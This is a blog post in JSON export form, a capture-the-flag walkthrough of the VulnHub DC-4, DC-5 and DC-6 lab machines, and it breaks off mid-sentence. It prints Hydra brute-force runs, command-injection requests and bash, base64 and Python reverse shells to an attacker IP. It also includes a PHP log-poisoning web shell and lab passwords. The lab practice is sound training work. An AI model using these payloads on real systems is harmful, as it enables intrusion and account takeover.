{"id":292,"date":"2025-07-15T13:27:50","date_gmt":"2025-07-15T13:27:50","guid":{"rendered":"https:\/\/hackingwithj.com\/?p=292"},"modified":"2025-07-17T06:14:42","modified_gmt":"2025-07-17T06:14:42","slug":"ctf-dc-4-dc-5-dc-6-intermediate","status":"publish","type":"post","link":"https:\/\/hackingwithj.com\/?p=292","title":{"rendered":"CTF: DC-4, DC-5, DC-6 (intermediate)"},"content":{"rendered":"\n<p>As part of my CEH Practical prep, I\u2019m sharpening my enumeration and exploitation workflow using realistic boot2root machines. The <a>DC series<\/a> on VulnHub is perfect for this: local, legal, and logically progressive. In this post, I\u2019ll walk through <strong>DC-4<\/strong>, <strong>DC-5, DC-6<\/strong> \u2014 there are more web-focused VMs in the series.<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">DC-4<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">Enumeration<\/h2>\n\n\n\n<p>Let\u2019s start with a full Nmap scan:<\/p>\n\n\n\n<pre class=\"wp-block-code has-vivid-purple-color has-text-color has-link-color wp-elements-9f26c14e01b6031e72f46154343dfd40\"><code>\u250c\u2500\u2500(kali\u327fkali)-&#91;~\/Downloads]\n\u2514\u2500$ nmap -sCV -T4 -A -p- -Pn 10.0.2.19\nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-07-09 12:01 EDT\nNmap scan report for 10.0.2.19\nHost is up (0.00095s latency).\nNot shown: 65533 closed tcp ports (reset)\nPORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)\n| ssh-hostkey: \n|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)\n|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)\n|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)\n80\/tcp open  http    nginx 1.15.10\n|_http-server-header: nginx\/1.15.10\n|_http-title: System Tools\nMAC Address: 08:00:27:53:29:29 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nDevice type: general purpose\nRunning: Linux 3.X|4.X\nOS CPE: cpe:\/o:linux:linux_kernel:3 cpe:\/o:linux:linux_kernel:4\nOS details: Linux 3.2 - 4.14, Linux 3.8 - 3.16\nNetwork Distance: 1 hop\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE\nHOP RTT     ADDRESS\n1   0.95 ms 10.0.2.19\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 22.26 seconds<\/code><\/pre>\n\n\n\n<p>Only SSH and HTTP open. Let\u2019s hit the web server first.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Webserver (port 80)<\/h2>\n\n\n\n<p>The root page was just a login form. Time to go down the usual rabbit hole.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Ran <code>gobuster<\/code> \u2013 nothing useful beyond <code>\/images<\/code> and <code>\/css<\/code>, both forbidden.<\/li>\n\n\n\n<li>Tried <code>robots.txt<\/code>, path traversal, SQLi, null bytes\u2026 even <code>nginxpwner<\/code>. Nada.<\/li>\n\n\n\n<li>Eventually, I decided to YOLO it with Hydra:<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code has-vivid-purple-color has-text-color has-link-color wp-elements-1b8fad8acf24b2bdcd5c92494c11a6c5\"><code>\u250c\u2500\u2500(kali\u327fkali)-&#91;~\/Documents\/tools\/nginxpwner]\n\u2514\u2500$ hydra -l admin -P \/usr\/share\/wordlists\/rockyou.txt 10.0.2.19 http-post-form \"\/login.php:username=^USER^&amp;password=^PASS^:H=504\" -V\n\n&#91;80]&#91;http-post-form] host: 10.0.2.19   login: admin   password: 123456\n&#91;80]&#91;http-post-form] host: 10.0.2.19   login: admin   password: 12345\n&#91;80]&#91;http-post-form] host: 10.0.2.19   login: admin   password: 123456789\n&#91;80]&#91;http-post-form] host: 10.0.2.19   login: admin   password: password\n&#91;80]&#91;http-post-form] host: 10.0.2.19   login: admin   password: princess\n&#91;80]&#91;http-post-form] host: 10.0.2.19   login: admin   password: 1234567\n&#91;80]&#91;http-post-form] host: 10.0.2.19   login: admin   password: rockyou\n&#91;80]&#91;http-post-form] host: 10.0.2.19   login: admin   password: 12345678\n&#91;80]&#91;http-post-form] host: 10.0.2.19   login: admin   password: lovely\n&#91;80]&#91;http-post-form] host: 10.0.2.19   login: admin   password: iloveyou\n&#91;80]&#91;http-post-form] host: 10.0.2.19   login: admin   password: monkey\n&#91;80]&#91;http-post-form] host: 10.0.2.19   login: admin   password: abc123\n&#91;80]&#91;http-post-form] host: 10.0.2.19   login: admin   password: nicole\n&#91;80]&#91;http-post-form] host: 10.0.2.19   login: admin   password: daniel\n&#91;80]&#91;http-post-form] host: 10.0.2.19   login: admin   password: babygirl\n&#91;80]&#91;http-post-form] host: 10.0.2.19   login: admin   password: jessica<\/code><\/pre>\n\n\n\n<p>At first, I thought it was a joke \u2014 but they were all valid logins. Even better, using Burp and filtering by length, I found several more:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"340\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-24-1024x340.png\" alt=\"\" class=\"wp-image-293\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-24-1024x340.png 1024w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-24-300x100.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-24-768x255.png 768w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-24.png 1268w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Initial Acces<\/h2>\n\n\n\n<p>Regardless of which credentials I used, I ended up here:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"887\" height=\"315\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-25.png\" alt=\"\" class=\"wp-image-294\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-25.png 887w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-25-300x107.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-25-768x273.png 768w\" sizes=\"auto, (max-width: 887px) 100vw, 887px\" \/><\/figure>\n\n\n\n<p>Intercepting this with Burp showed we could tamper with the command:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"516\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-26-1024x516.png\" alt=\"\" class=\"wp-image-296\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-26-1024x516.png 1024w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-26-300x151.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-26-768x387.png 768w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-26.png 1507w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"528\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-27-1024x528.png\" alt=\"\" class=\"wp-image-297\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-27-1024x528.png 1024w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-27-300x155.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-27-768x396.png 768w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-27.png 1510w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><strong>Attempt 1<\/strong>: Raw Bash Reverse Shell<\/p>\n\n\n\n<pre class=\"wp-block-code has-vivid-purple-color has-text-color has-link-color wp-elements-41c836d788d2b64a9d1caaff361f503e\"><code>radio=bash+-i+>&amp;+\/dev\/tcp\/10.0.2.5\/4444+0>&amp;1&amp;submit=Run<\/code><\/pre>\n\n\n\n<p>Failed \u2014 the <code>&amp;<\/code> gets encoded or stripped.<\/p>\n\n\n\n<p><strong>Attempt 2<\/strong>: Base64 payload<\/p>\n\n\n\n<pre class=\"wp-block-code has-vivid-purple-color has-text-color has-link-color wp-elements-270245a0dc1c8026c53fc6e2b8df3420\"><code>\u250c\u2500\u2500(kali\u327fkali)-&#91;~\/Documents\/tools\/nginxpwner]\n\u2514\u2500$ echo \"bash -i >&amp; \/dev\/tcp\/10.0.2.5\/4444 0>&amp;1\" | base64\nYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjIuNS80NDQ0IDA+JjEK\n\nOn the request:\nradio=echo+YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjIuNS80NDQ0IDA+JjEK|base64+-d|bash&amp;submit=Run<\/code><\/pre>\n\n\n\n<p><strong>Final shot<\/strong>: Python reverse shell<\/p>\n\n\n\n<pre class=\"wp-block-code has-vivid-purple-color has-text-color has-link-color wp-elements-a7e617f6fbd363d5d2e4533c102ffc61\"><code>radio=python+-c+'import+socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.2.5\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(&#91;\"\/bin\/sh\",\"-i\"]);'&amp;submit=Run<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"449\" height=\"112\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-29.png\" alt=\"\" class=\"wp-image-299\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-29.png 449w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-29-300x75.png 300w\" sizes=\"auto, (max-width: 449px) 100vw, 449px\" \/><\/figure>\n\n\n\n<p>Reverse shell landed as <code>www-data<\/code>.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Escalating privileges<\/h2>\n\n\n\n<p>After looking around, we\u2019ve got a user called <code>jim<\/code> with the following files:<\/p>\n\n\n\n<pre class=\"wp-block-code has-vivid-purple-color has-text-color has-link-color wp-elements-a9fcd49a19134712a9d5196cb79671d1\"><code>www-data@dc-4:\/home\/jim$ ls -la\ndrwxr-xr-x 2 jim  jim  4096 Apr  7  2019 backups\n-rw------- 1 jim  jim   528 Apr  6  2019 mbox\n-rwsrwxrwx 1 jim  jim   174 Apr  6  2019 test.sh\nwww-data@dc-4:\/home\/jim$ cat test.sh \n#!\/bin\/bash\nfor i in {1..5}\ndo\n sleep 1\n echo \"Learn bash they said.\"\n sleep 1\n echo \"Bash is good they said.\"\ndone\n echo \"But I'd rather bash my head against a brick wall.\"\nwww-data@dc-4:\/home\/jim$ cd backups\/\nwww-data@dc-4:\/home\/jim\/backups$ ls -la\ntotal 12\ndrwxr-xr-x 2 jim jim 4096 Apr  7  2019 .\ndrwxr-xr-x 3 jim jim 4096 Apr  7  2019 ..\n-rw-r--r-- 1 jim jim 2047 Apr  7  2019 old-passwords.bak<\/code><\/pre>\n\n\n\n<p>While the <code>test.sh<\/code> script was amusing, the <code>backup-passwords.bak<\/code> file looked far more promising. So, I downloaded it to my local machine and ran Hydra against it.<\/p>\n\n\n\n<pre class=\"wp-block-code has-vivid-purple-color has-text-color has-link-color wp-elements-aacb6d80a7b0280d64e5b6118f55de93\"><code>\u250c\u2500\u2500(kali\u327fkali)-&#91;~\/Downloads\/ctf\/dc-4]\n\u2514\u2500$ hydra -l jim -P old-passwords.bak ssh:\/\/10.0.2.19                \n\n&#91;22]&#91;ssh] host: 10.0.2.19   login: jim   password: jibril04\n1 of 1 target successfully completed, 1 valid password found\n<\/code><\/pre>\n\n\n\n<p>After some initial digging, I didn\u2019t uncover anything useful \u2014 but running LinPEAS revealed the following:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"761\" height=\"98\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-30.png\" alt=\"\" class=\"wp-image-300\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-30.png 761w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-30-300x39.png 300w\" sizes=\"auto, (max-width: 761px) 100vw, 761px\" \/><\/figure>\n\n\n\n<p>The email contained the following information:<\/p>\n\n\n\n<pre class=\"wp-block-code has-vivid-purple-color has-text-color has-link-color wp-elements-5f66a5dbb745763d70aa410e00378a43\"><code>jim@dc-4:\/var\/mail$ cat jim \nFrom charles@dc-4 Sat Apr 06 21:15:46 2019\nReturn-path: &lt;charles@dc-4>\nEnvelope-to: jim@dc-4\nDelivery-date: Sat, 06 Apr 2019 21:15:46 +1000\nReceived: from charles by dc-4 with local (Exim 4.89)\n        (envelope-from &lt;charles@dc-4>)\n        id 1hCjIX-0000kO-Qt\n        for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000\nTo: jim@dc-4\nSubject: Holidays\nMIME-Version: 1.0\nContent-Type: text\/plain; charset=\"UTF-8\"\nContent-Transfer-Encoding: 8bit\nMessage-Id: &lt;E1hCjIX-0000kO-Qt@dc-4>\nFrom: Charles &lt;charles@dc-4>\nDate: Sat, 06 Apr 2019 21:15:45 +1000\nStatus: O\n\nHi Jim,\n\nI'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.\n\nPassword is:  ^xHhA&amp;hvim0y\n\nSee ya,\nCharles<\/code><\/pre>\n\n\n\n<p>How kind of Charles to share his password \u2014 after switching to his user and running <code>sudo -l<\/code>, things got interesting.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"873\" height=\"95\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-31.png\" alt=\"\" class=\"wp-image-301\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-31.png 873w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-31-300x33.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-31-768x84.png 768w\" sizes=\"auto, (max-width: 873px) 100vw, 873px\" \/><\/figure>\n\n\n\n<p>After looking into privilege escalation with <code>teehee<\/code> (which turns out to be a modified version of <code>tee<\/code>), I came across this method: <a href=\"https:\/\/exploit-notes.hdks.org\/exploit\/linux\/privilege-escalation\/sudo\/sudo-tee-privilege-escalation\/\">Sudo Tee Privilege Escalation | Exploit Notes<\/a><\/p>\n\n\n\n<p>And just like that \u2014 root access achieved.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"961\" height=\"620\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-32.png\" alt=\"\" class=\"wp-image-302\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-32.png 961w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-32-300x194.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-32-768x495.png 768w\" sizes=\"auto, (max-width: 961px) 100vw, 961px\" \/><\/figure>\n\n\n\n<h1 class=\"wp-block-heading\">DC-5<\/h1>\n\n\n\n<p>the nmap showed:<\/p>\n\n\n\n<pre class=\"wp-block-code has-vivid-purple-color has-text-color has-link-color wp-elements-cb6c98309d04cf44e0ddfe8e1d42a243\"><code>\u2500\u2500(kali\u327fkali)-&#91;~]\n\u2514\u2500$ nmap -sCV -T4 -A -p- -Pn 10.0.2.20\nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-07-09 15:01 EDT\nNmap scan report for 10.0.2.20\nHost is up (0.00076s latency).\nNot shown: 65532 closed tcp ports (reset)\nPORT      STATE SERVICE VERSION\n80\/tcp    open  http    nginx 1.6.2\n|_http-server-header: nginx\/1.6.2\n|_http-title: Welcome\n111\/tcp   open  rpcbind 2-4 (RPC #100000)\n| rpcinfo: \n|   program version    port\/proto  service\n|   100000  2,3,4        111\/tcp   rpcbind\n|   100000  2,3,4        111\/udp   rpcbind\n|   100000  3,4          111\/tcp6  rpcbind\n|   100000  3,4          111\/udp6  rpcbind\n|   100024  1          34447\/udp6  status\n|   100024  1          37844\/udp   status\n|   100024  1          47341\/tcp6  status\n|_  100024  1          55485\/tcp   status\n55485\/tcp open  status  1 (RPC #100024)\nMAC Address: 08:00:27:E2:43:20 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nDevice type: general purpose\nRunning: Linux 3.X|4.X\nOS CPE: cpe:\/o:linux:linux_kernel:3 cpe:\/o:linux:linux_kernel:4\nOS details: Linux 3.2 - 4.14, Linux 3.8 - 3.16\nNetwork Distance: 1 hop\n\nTRACEROUTE\nHOP RTT     ADDRESS\n1   0.75 ms 10.0.2.20\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 34.51 seconds<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">HTTP (port 80)<\/h2>\n\n\n\n<p>The website on port 80 looked like a basic template with fake-looking content \u2014 but there was a <strong>contact form<\/strong>. After submitting some data, it redirected me to a new URL, which looked dynamic and potentially injectable.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"708\" height=\"52\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-34.png\" alt=\"\" class=\"wp-image-305\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-34.png 708w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-34-300x22.png 300w\" sizes=\"auto, (max-width: 708px) 100vw, 708px\" \/><\/figure>\n\n\n\n<p>Naturally, I tested it for <strong>LFI<\/strong> (Local File Inclusion).<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"359\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-33-1024x359.png\" alt=\"\" class=\"wp-image-306\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-33-1024x359.png 1024w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-33-300x105.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-33-768x270.png 768w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-33.png 1356w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Local File Inclusion &amp; Log Poisoning<\/h2>\n\n\n\n<p>Turns out, the LFI worked. Although browsing files wasn\u2019t super practical, I did manage to access the <strong>nginx logs<\/strong>. From there, AI nudged me toward <strong>log poisoning<\/strong> \u2014 a classic trick. To test it, I sent a malicious User-Agent string containing PHP code:<\/p>\n\n\n\n<pre class=\"wp-block-code has-vivid-purple-color has-text-color has-link-color wp-elements-f6cd323f9c25992213c36c2eaaef00c4\"><code>\u250c\u2500\u2500(kali\u327fkali)-&#91;~]\n\u2514\u2500$ curl -A \"&lt;?php system(\\$_GET&#91;'cmd']); ?>\" http:\/\/10.0.2.22<\/code><\/pre>\n\n\n\n<p>After that, I used the LFI to include the poisoned log file and execute commands via <code>cmd=<\/code> in the URL.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"377\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-35-1024x377.png\" alt=\"\" class=\"wp-image-307\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-35-1024x377.png 1024w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-35-300x110.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-35-768x283.png 768w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-35.png 1234w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>With the log successfully poisoned, I went for a reverse shell:<\/p>\n\n\n\n<pre class=\"wp-block-code has-vivid-purple-color has-text-color has-link-color wp-elements-a1e6264c871bd19d2bf175b2d779af72\"><code>bash -c 'bash -i >&amp; \/dev\/tcp\/10.0.2.5\/4444 0>&amp;1'\npython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.2.5\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(&#91;\"\/bin\/sh\",\"-i\"]);'<\/code><\/pre>\n\n\n\n<p>Despite the log poisoning trick working initially and giving me command execution, I just couldn&#8217;t get a reverse shell to stick. I tried multiple payloads \u2014 from Bash to Python to Netcat \u2014 tweaking encodings, changing IPs and ports, even checking if outbound connections were being blocked\u2026 but nothing.<\/p>\n\n\n\n<p>It seemed like the webserver only executed the payload once, and after that, the log file stopped behaving like PHP. Maybe it was being cached or sanitized after the first hit. Either way, nothing I tried after that would trigger execution again. At some point, I realized I was spending more time trying to force a shell than it was worth \u2014 especially for a challenge box. So yeah\u2026 this one beat me (for now \ud83d\ude24).<\/p>\n\n\n\n<p>Sometimes walking away is better than going down a rabbit hole. On to the next!<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">DC-6<\/h1>\n\n\n\n<p>Started this one off with the usual full port scan:<\/p>\n\n\n\n<pre class=\"wp-block-code has-vivid-purple-color has-text-color has-link-color wp-elements-c5b18f0014192d50844986f82858fd5d\"><code>\u250c\u2500\u2500(kali\u327fkali)-&#91;~]\n\u2514\u2500$ nmap -sCV -T4 -A -p- -Pn wordy    \nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-07-10 06:47 EDT\nNmap scan report for wordy (10.0.2.24)\nHost is up (0.00057s latency).\nNot shown: 65533 closed tcp ports (reset)\nPORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)\n| ssh-hostkey: \n|   2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)\n|   256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)\n|_  256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)\n80\/tcp open  http    Apache httpd 2.4.25 ((Debian))\n|_http-generator: WordPress 5.1.1\n|_http-server-header: Apache\/2.4.25 (Debian)\n|_http-title: Wordy &amp;#8211; Just another WordPress site\nMAC Address: 08:00:27:30:64:E1 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nDevice type: general purpose\nRunning: Linux 3.X|4.X\nOS CPE: cpe:\/o:linux:linux_kernel:3 cpe:\/o:linux:linux_kernel:4\nOS details: Linux 3.2 - 4.14\nNetwork Distance: 1 hop\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE\nHOP RTT     ADDRESS\n1   0.57 ms wordy (10.0.2.24)\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 21.16 seconds<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">HTTP (port 80)<\/h2>\n\n\n\n<p>The website looked like a fresh WordPress install with the classic &#8220;twentyseventeen&#8221; theme. I ran <code>gobuster<\/code> to confirm some default paths and then used <code>wpscan<\/code> to dig deeper. No vulnerable plugins turned up, but the theme version (twentyseventeen v2.1) <em>did<\/em> have a stored XSS vulnerability: <strong>CVE-2023-5162<\/strong> \u2014 sadly, this requires authentication to exploit. So the next step: enumerate users.<\/p>\n\n\n\n<pre class=\"wp-block-code has-vivid-purple-color has-text-color has-link-color wp-elements-f1eecafdec66b03d90bb0f6454afb497\"><code>\u250c\u2500\u2500(kali\u327fkali)-&#91;~]\n\u2514\u2500$ wpscan --url 'http:\/\/wordy' --enumerate u\n\n&#91;i] User(s) Identified:\n\n&#91;+] admin\n | Found By: Rss Generator (Passive Detection)\n | Confirmed By:\n |  Wp Json Api (Aggressive Detection)\n |   - http:\/\/wordy\/index.php\/wp-json\/wp\/v2\/users\/?per_page=100&amp;page=1\n |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)\n |  Login Error Messages (Aggressive Detection)\n\n&#91;+] graham\n | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)\n | Confirmed By: Login Error Messages (Aggressive Detection)\n\n&#91;+] mark\n | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)\n | Confirmed By: Login Error Messages (Aggressive Detection)\n\n&#91;+] sarah\n | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)\n | Confirmed By: Login Error Messages (Aggressive Detection)\n\n&#91;+] jens\n | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)\n | Confirmed By: Login Error Messages (Aggressive Detection)<\/code><\/pre>\n\n\n\n<p>The VulnHub description hinted that we shouldn\u2019t wait \u201c5 years\u201d and gave us a command to speed things up \u2014 a clear nudge toward password spraying or bruteforcing:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"975\" height=\"110\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-36.png\" alt=\"\" class=\"wp-image-309\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-36.png 975w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-36-300x34.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-36-768x87.png 768w\" sizes=\"auto, (max-width: 975px) 100vw, 975px\" \/><\/figure>\n\n\n\n<p>Eventually, I was able to log in with limited permissions under a helpdesk-style account. No admin dashboard, no plugin editing \u2014 just basic access. But something interesting <em>did<\/em> stand out: &#8216;Plainview Activity Monitor&#8217;<\/p>\n\n\n\n<p>Some quick research revealed a known exploit:: <a href=\"https:\/\/www.exploit-db.com\/exploits\/50110\">WordPress Plugin Plainview Activity Monitor 20161228 &#8211; Remote Code Execution (RCE) (Authenticated) (2) &#8211; PHP webapps Exploit<\/a> After trying it we got a shell:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"570\" height=\"248\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-37.png\" alt=\"\" class=\"wp-image-310\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-37.png 570w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-37-300x131.png 300w\" sizes=\"auto, (max-width: 570px) 100vw, 570px\" \/><\/figure>\n\n\n\n<p>While snooping around with a somewhat shaky shell, I stumbled across this:<\/p>\n\n\n\n<pre class=\"wp-block-code has-vivid-purple-color has-text-color has-link-color wp-elements-1e83241c27d6ef73f80d373470b4c910\"><code>www-data@wordy  cat \/home\/mark\/stuff\/things-to-do.txt\nThings to do:\n- Restore full functionality for the hyperdrive (need to speak to Jens)\n- Buy present for Sarah's farewell party\n- Add new user: graham - GSo7isUM1D4 - done\n- Apply for the OSCP course\n- Buy new laptop for Sarah's replacement<\/code><\/pre>\n\n\n\n<p class=\"has-black-color has-text-color has-link-color wp-elements-f09620df453befff9b6c7644ef63cee8\">Used the creds to SSH into the machine as <code>graham<\/code>. Privileges were still limited, but a <code>sudo -l<\/code> showed something interesting:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"873\" height=\"146\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-38.png\" alt=\"\" class=\"wp-image-311\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-38.png 873w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-38-300x50.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-38-768x128.png 768w\" sizes=\"auto, (max-width: 873px) 100vw, 873px\" \/><\/figure>\n\n\n\n<p>We also have permission to edit the file, so we can simply insert a reverse shell payload like this:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"223\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-39-1024x223.png\" alt=\"\" class=\"wp-image-312\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-39-1024x223.png 1024w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-39-300x65.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-39-768x167.png 768w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2025\/07\/image-39.png 1359w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Then, by running <code>sudo -l<\/code>, we discovered we can execute <code>nmap<\/code> as root without a 